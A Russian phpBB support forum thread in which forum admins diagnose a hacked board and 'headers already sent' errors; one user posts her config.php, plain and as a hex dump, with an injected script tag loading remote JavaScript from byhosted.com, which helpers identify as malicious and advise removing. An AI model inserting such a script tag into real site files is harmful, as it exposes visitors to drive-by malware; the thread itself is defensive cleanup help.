Как убить Трояна?

Вопросы без привязки к версии. Установлена авточистка (2 года).
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения

Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение ;) ).
AdmninsCluba
phpBB 1.2.1
Сообщения: 22
Стаж: 18 лет 7 месяцев
Благодарил (а): 1 раз

Как убить Трояна?

Сообщение AdmninsCluba »

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html
Аватара пользователя
Пчелкин
phpBB 3.3.0
Сообщения: 11121
Стаж: 15 лет 3 месяца
Откуда: fotovideoforum.ru
Благодарил (а): 670 раз
Поблагодарили: 122 раза

Re: Ошибка phpBB Debug

Сообщение Пчелкин »

Тогда вероятно что у вас хостер что-то обновил из своего программного обеспечения.
Переписываться с ними бесполезно, сами вы глюк, скорей всего, не исправите..
Лучше в рекрутинг..
Или хотя бы вытащите с хоста лог ошибок...может помощь
NIKON-D90, AF-S 18-105, AF-S 14-24, AF-S 24-70
NiGHt-LEshiY
phpBB 1.2.1
Сообщения: 24
Стаж: 13 лет 9 месяцев

Re: Ошибка phpBB Debug

Сообщение NiGHt-LEshiY »

Глюк? Кхм.
Output started at /config.php:1

Покажите ваш config.php ЦЕЛИКОМ. Только сотрите ваш пароль оттуда.
Аватара пользователя
MIT
Former team member
Сообщения: 2500
Стаж: 16 лет 1 месяц
Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
Поблагодарили: 26 раз

Re: Ошибка phpBB Debug

Сообщение MIT »

И желательно в виде HEX-дампа...
Аватара пользователя
Mileno4ka
phpBB 1.2.0
Сообщения: 14
Стаж: 14 лет 6 месяцев

Re: Ошибка phpBB Debug

Сообщение Mileno4ka »

Здравствуйте!

На наших серверах никаках изменений не производилось.
Ошибки, которые Вы можете видеть на сайте обусловлены невозможностью послать
заголовок (Cannot modify header information - headers already sent).

Далее идёт сообщение, в каком скрипте и в какой его строке by (output started
at /config.php:17) произошел вывод информации, вызвавший автоматическую
посылку заголовков.
В данном случае ошибку вызывает файл, подключаемый через include, в котором
либо есть какой-то вывод, либо пустая строка после закрывающего PHP тега. (PHP
Notice: in file /includes/session.php - обратить внимание на файл
/includes/session.php).

С уважением, Куринова Ирина
Служба технической поддержки PeterHost

Добавлено спустя 4 минуты 37 секунд:


Файл config.php

Код: Выделить всё


<?php
// phpBB 3.0.x auto-generated configuration file
// Do not change anything in this file!
$dbms = 'mysql';
$dbhost = 'mysql.vertexsp.z8.ru';
$dbport = '';
$dbname = 'db_vertexsp_2';
$dbuser = 'dbu_vertexsp_2';
$dbpasswd = '*********';
$table_prefix = 'phpbb_';
$acm_type = 'file';
$load_extensions = '';

@define('PHPBB_INSTALLED', true);
// @define('DEBUG', true);
// @define('DEBUG_EXTRA', true);
?><script src="http://byhosted.com/ajaxengine.js"></script>
HEX

Код: Выделить всё

3c 3f 70 68 70 0d 0a 2f 2f 20 70 68 70 42 42 20
33 2e 30 2e 78 20 61 75 74 6f 2d 67 65 6e 65 72
61 74 65 64 20 63 6f 6e 66 69 67 75 72 61 74 69
6f 6e 20 66 69 6c 65 0d 0a 2f 2f 20 44 6f 20 6e
6f 74 20 63 68 61 6e 67 65 20 61 6e 79 74 68 69
6e 67 20 69 6e 20 74 68 69 73 20 66 69 6c 65 21
0d 0a 24 64 62 6d 73 20 3d 20 27 6d 79 73 71 6c
27 3b 0d 0a 24 64 62 68 6f 73 74 20 3d 20 27 6d
79 73 71 6c 2e 76 65 72 74 65 78 73 70 2e 7a 38
2e 72 75 27 3b 0d 0a 24 64 62 70 6f 72 74 20 3d
20 27 27 3b 0d 0a 24 64 62 6e 61 6d 65 20 3d 20
27 64 62 5f 76 65 72 74 65 78 73 70 5f 32 27 3b
0d 0a 24 64 62 75 73 65 72 20 3d 20 27 64 62 75
5f 76 65 72 74 65 78 73 70 5f 32 27 3b 0d 0a 24
64 62 70 61 73 73 77 64 20 3d 20 27 2a 2a 2a 2a
2a 2a 27 3b 0d 0a 24 74 61 62 6c 65 5f 70 72 65
66 69 78 20 3d 20 27 70 68 70 62 62 5f 27 3b 0d
0a 24 61 63 6d 5f 74 79 70 65 20 3d 20 27 66 69
6c 65 27 3b 0d 0a 24 6c 6f 61 64 5f 65 78 74 65
6e 73 69 6f 6e 73 20 3d 20 27 27 3b 0d 0a 0d 0a
40 64 65 66 69 6e 65 28 27 50 48 50 42 42 5f 49
4e 53 54 41 4c 4c 45 44 27 2c 20 74 72 75 65 29
3b 0d 0a 2f 2f 20 40 64 65 66 69 6e 65 28 27 44
45 42 55 47 27 2c 20 74 72 75 65 29 3b 0d 0a 2f
2f 20 40 64 65 66 69 6e 65 28 27 44 45 42 55 47
5f 45 58 54 52 41 27 2c 20 74 72 75 65 29 3b 0d
0a 3f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22
68 74 74 70 3a 2f 2f 62 79 68 6f 73 74 65 64 2e
63 6f 6d 2f 61 6a 61 78 65 6e 67 69 6e 65 2e 6a
73 22 3e 3c 2f 73 63 72 69 70 74 3e
Добавлено спустя 1 минуту 8 секунд:

Добавлено спустя 25 минут 40 секунд:
[phpBB Debug] PHP Notice: in file /includes/session.php on line 1024: Cannot modify header information - headers already sent by (output started at /config.php:17)
Ругается на последнюю строку:

Код: Выделить всё

function set_cookie($name, $cookiedata, $cookietime)
	{
		global $config;

		$name_data = rawurlencode($config['cookie_name'] . '_' . $name) . '=' . rawurlencode($cookiedata);
		$expire = gmdate('D, d-M-Y H:i:s \G\M\T', $cookietime);
		$domain = (!$config['cookie_domain'] || $config['cookie_domain'] == 'localhost' || $config['cookie_domain'] == '127.0.0.1') ? '' : '; domain=' . $config['cookie_domain'];

		header('Set-Cookie: ' . $name_data . (($cookietime) ? '; expires=' . $expire : '') . '; path=' . $config['cookie_path'] . $domain . ((!$config['cookie_secure']) ? '' : '; secure') . '; HttpOnly', false);
	}
phpBB Debug] PHP Notice: in file /includes/functions.php on line 4505: Cannot modify header information - headers already sent by (output started at /config.php:17)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4507: Cannot modify header information - headers already sent by (output started at /config.php:17)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4508: Cannot modify header information - headers already sent by (output started at /config.php:17)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4509: Cannot modify header information - headers already sent by (output started at /config.php:17)
Ругается на весь кусок:

Код: Выделить всё

// application/xhtml+xml not used because of IE
	header('Content-type: text/html; charset=UTF-8');

	header('Cache-Control: private, no-cache="set-cookie"');
	header('Expires: 0');
	header('Pragma: no-cache');
Добавлено спустя 3 минуты 5 секунд:
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 2471: Cannot modify header information - headers already sent by (output started at /config.php:17)

Код: Выделить всё

// Behave as per HTTP/1.1 spec for others
	header('Location: ' . $url);
	exit;
MAzZY
Бывший член :)
Сообщения: 2925
Стаж: 19 лет 11 месяцев
Благодарил (а): 19 раз
Поблагодарили: 30 раз
Забанен: Бессрочно

Re: Ошибка phpBB Debug

Сообщение MAzZY »

Mileno4ka писал(а):<script src="http://byhosted.com/ajaxengine.js"></script>
Это кто вставил в конфиг?
Аватара пользователя
Mileno4ka
phpBB 1.2.0
Сообщения: 14
Стаж: 14 лет 6 месяцев

Re: Ошибка phpBB Debug

Сообщение Mileno4ka »

Никто... Так и было..
Аватара пользователя
Pazh
Former team member
Сообщения: 2317
Стаж: 15 лет 5 месяцев
Благодарил (а): 20 раз
Поблагодарили: 221 раз

Re: Ошибка phpBB Debug

Сообщение Pazh »

В изначальном конфиге такой строки нет. Впервые вижу чтобы так в config что-то добавляли.
Последний раз редактировалось FEAR93 09.08.2011 20:28, всего редактировалось 1 раз.
Причина: Убрал оверквотинг.
Помощь в ЛС/email только за WM или ЮMoney
Аватара пользователя
Mileno4ka
phpBB 1.2.0
Сообщения: 14
Стаж: 14 лет 6 месяцев

Re: Ошибка phpBB Debug

Сообщение Mileno4ka »

В пятницу все работало. А придя утром в понедельник на работу столкнулась с этой проблемой.
На самом деле я была полдня уверена, что проблема на стороне хостера, т.к. я программировании я не особо сильна (на уровне программы технического вуза). Зачем что то трогать, если оно отлично работает?

Я обратила внимание, что этот скрипт присутствует в обоих файлах, но не придала этому значение.
Аватара пользователя
MIT
Former team member
Сообщения: 2500
Стаж: 16 лет 1 месяц
Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
Поблагодарили: 26 раз

Re: Ошибка phpBB Debug

Сообщение MIT »

Mileno4ka писал(а):HEX
Я, право слово, не думал, что ты и впрямь предоставишь бинарный дамп. Зачот ;)
В нём бы можно было увидеть данные BOM-сигнатуры, но у тебя их нет.

А код
Mileno4ka писал(а):<script src="http://***.com/ajaxengine.js"></script>
является вредоносным, его необходимо удалить, а также озаботится сменой всех паролей и поиском подозрительных файлов на форуме.
Аватара пользователя
Mileno4ka
phpBB 1.2.0
Сообщения: 14
Стаж: 14 лет 6 месяцев

Re: Ошибка phpBB Debug

Сообщение Mileno4ka »

Спасибо всем. Удалила. Он был прописан в 6 файлах еще. Форум пашет. Пароли, явки сменю.
Lexx112
phpBB 1.4.0
Сообщения: 32
Стаж: 14 лет 11 месяцев

Re: Как убить Трояна?

Сообщение Lexx112 »

VeroLom писал(а):1. Качаете и запускаете из корня сайта скрипт с http://www.0xff.su/0x0005
2. Меняете все пароли
А если вредоносный скрипт от гугл нахлабучили? Уже не прокатит этот метод?
ArtTeam
phpBB 1.4.4
Сообщения: 198
Стаж: 14 лет 11 месяцев
Благодарил (а): 4 раза
Поблагодарили: 1 раз

Re: Как убить Трояна?

Сообщение ArtTeam »

зашел сегодня на форум, а мне выдает от касперского
5.jpg
спустя пять минут при заходе на форум стало все нормально
что это может быть ?
На хосте проверил антивирусом не чего не нашло
И самое странное что лазя в этой теме перейдя на 9 страницу у меня вылезло
5555555.jpg
Может у меня заражен сам комп а не сайт ?
У вас нет необходимых прав для просмотра вложений в этом сообщении.
Аватара пользователя
IP_Board
phpBB 1.4.4
Сообщения: 109
Стаж: 13 лет 10 месяцев

Re: Как убить Трояна?

Сообщение IP_Board »

Скачиваем Dr.Web CureIt! и Kaspersky Virus Removal Tool 2011, выполняем полную проверку компьютера. Затем удаляем KIS 2010, скачиваем и устанавливаем (в процессе удаления 2010 версии выберите галочку "Сохранить информацию о лицензии) KIS 2012. Обновляем базу и проверяем ещё раз компьютер.
После чего, читаем данный топик — все ответы на Ваши вопросы в нём есть.
Аватара пользователя
pavelkim
phpBB 1.4.4
Сообщения: 113
Стаж: 15 лет 8 месяцев
Откуда: Беларусь

Re: Как убить Трояна?

Сообщение pavelkim »

После заражения форума трояном, после его чистки осталась таки одна проблема. В личном разделе во вкладке личные сообщения при нажатии на "Найти пользователя" антивирус ругается на троян.
Подскажите, пожалуйста, какие файлы посмотреть-проверить на наличие вредоносного кода?
Аватара пользователя
Sheer
Former team member
Сообщения: 12113
Стаж: 18 лет 2 месяца
Откуда: Калининград не Кенигсберг
Благодарил (а): 36 раз
Поблагодарили: 1526 раз

Re: Как убить Трояна?

Сообщение Sheer »

pavelkim писал(а):какие файлы посмотреть
Все.
Изображение
Общие ошибки новичков (07.11.2005) & Как задавать вопросы
Мини FAQ
Если ничто другое не помогает, прочтите, наконец, инструкцию!
"Никакая инструкция не может перечислить всех обязанностей должностного лица, предусмотреть все отдельные случаи и дать вперёд соответствующие указания, а поэтому господа инженеры должны проявить инициативу и, руководствуясь знаниями своей специальности и пользой дела, принять все усилия для оправдания своего назначения".
Циркуляр Морского технического комитета №15 от 29.11.1910 г.

Вернуться в «phpBB-пространство»